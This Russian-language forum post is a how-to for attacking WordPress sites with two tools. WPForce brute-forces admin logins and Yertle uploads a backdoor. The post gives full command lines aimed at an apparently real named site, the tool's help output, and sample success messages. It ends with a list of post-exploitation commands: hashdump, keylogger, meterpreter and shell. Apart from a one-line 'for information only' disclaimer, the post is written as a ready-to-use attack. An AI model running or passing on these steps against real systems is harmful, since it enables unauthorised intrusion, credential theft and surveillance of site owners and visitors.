Всем привет. Представляю вам скрипт "WpForce". Предназначенный для Брут-форса и эксплуатации движка "Wordpress".
Разработчик -== n00py
Страница разработчика -== n00py/WPForce
Вся информация предназначена исключительно для ознакомления.
WPForce - Скрипт, который выполняет брут-форс аутентификации WordPress.
После удачного подбора учётных данных будем использовать "Yertle".
Yertle – может использоваться для выгрузки бэкдора на сервер с WordPress
Выполняем атаку на сайт.
Код:
Пример - python wpforce.py -i '/root/Desktop/ee' -w '/root/Desktop/44' -u http://www.superlovers.fr
python wpforce.py -i <Список логинов> -w <Список паролей> -u <Сайт>
В случае успеха мы увидим что-то наподобие -== admin : admin are valid credentials! - THIS ACCOUNT IS ADMIN.
Справка.
Код:
-h, --help show this help message and exit
-i INPUT, --input INPUT
Input file name
-w WORDLIST, --wordlist WORDLIST
Wordlist file name
-u URL, --url URL URL of target
-v, --verbose Verbose output. Show the attemps as they happen.
-t THREADS, --threads THREADS
Determines the number of threads to be used, default
is 10
-a AGENT, --agent AGENT
Determines the user-agent
-d, --debug This option is used for determining issues with the
script.
После WPForce , используем скрипт "Yertle".
Вводим логин и пароль который Сбрутили.
Код:
Пример - python yertle.py -u admin -p admin -t http://www.superlovers.fr --interactive
python yertle.py -u логин -p пароль -t http://www.superlovers.fr --interactive
В случае успеха мы увидим - Backdoor uploaded!
Основные команды "Yertle".
beef
exit
hashdump
help
keylogger
keylog
meterpreter
quit
shell
stealth
Спасибо за внимание.